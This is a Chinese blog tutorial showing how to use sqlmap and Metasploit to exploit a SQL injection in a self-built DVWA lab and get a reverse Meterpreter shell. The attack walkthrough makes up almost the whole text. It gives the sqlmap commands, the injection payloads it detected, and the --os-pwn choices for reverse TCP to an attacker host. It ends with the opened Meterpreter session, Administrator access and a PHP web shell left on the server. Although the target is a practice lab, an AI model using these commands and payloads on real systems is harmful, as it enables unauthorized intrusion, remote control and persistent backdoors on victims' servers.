SQLMAP结合Meterpreter实现注入渗透返回shell
发布:smiling 来源: PHP粉丝网 添加日期:2018-10-15 09:41:32 浏览: 评论:0
自己搭建一个PHP+MYSQL平台,靶场为DVWA,设置SQL注入靶场级别为low(方便测试使用)。
在提交框中输入1,用burp抓包,将包数据复制到cookies.txt文档中,拖到kali环境。
root@kali:~# sqlmap -r "/root/cookies.txt"
返回:
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-1890' OR 7466=7466#&Submit=Submit
- Type: error-based
- Title: MySQL OR error-based - WHERE or HAVING clause
- Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
- Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit
- Type: UNION query
- Title: MySQL UNION query (NULL) - 2 columns
- Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
- ---
- [13:45:05] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.3.29, Apache 2.4.10
- back-end DBMS: MySQL 5.0.12
- [13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
确定注入点后:
- root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
部分省略:
- how do you want to establish the tunnel?
- [1] TCP: Metasploit Framework (default)
- [2] ICMP: icmpsh - ICMP tunneling
> 1(使用metasploit的TCP连接shell)
- which web application language does the web server support?
- [1] ASP (default)
- [2] ASPX
- [3] JSP
- [4] PHP
> 4(PHP的脚本)
- what do you want to use for writable directory?
- [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
- [2] custom location(s)
- [3] custom directory list file
- [4] brute force search
> 2(自定义路径)
- please provide a comma separate list of absolute directory paths: D:/WWW/DVWA/(输入绝对路径)
- which connection type do you want to use?
- [1] Reverse TCP: Connect back from the database host to this machine (default)
- [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
- [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
- [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
- [5] Bind TCP: Listen on the database host for a connection
- > 1(TCP反向连接shell)
- what is the local address? [Enter for '192.168.1.104' (detected)]
- which local port number do you want to use? [16308]
- which payload do you want to use?
- [1] Meterpreter (default)
- [2] Shell
- [3] VNC
- > 1(meterpreter shell)
部分省略:
- PAYLOAD => windows/meterpreter/reverse_tcp
- EXITFUNC => process
- LPORT => 16308
- LHOST => 192.168.1.104
- [*] Started reverse handler on 192.168.1.104:16308
- [*] Starting the payload handler...
- [13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
- [*] Sending stage (957487 bytes) to 192.168.1.8
- [*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
- meterpreter > Loading extension espia...success.
- meterpreter > Loading extension incognito...success.
- meterpreter > Computer : PGOS
- OS : Windows 7 (Build 7601, Service Pack 1).
- Architecture : x64 (Current Process is WOW64)
- System Language : zh_CN
- Domain : WORKGROUP
- Logged On Users : 1
- Meterpreter : x86/win32
- meterpreter > Server username: PGOS\Administrator
- meterpreter >
同时,DVWA目录下会生成一个随机的php上传shell。
Tags: SQLMAP Meterpreter
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)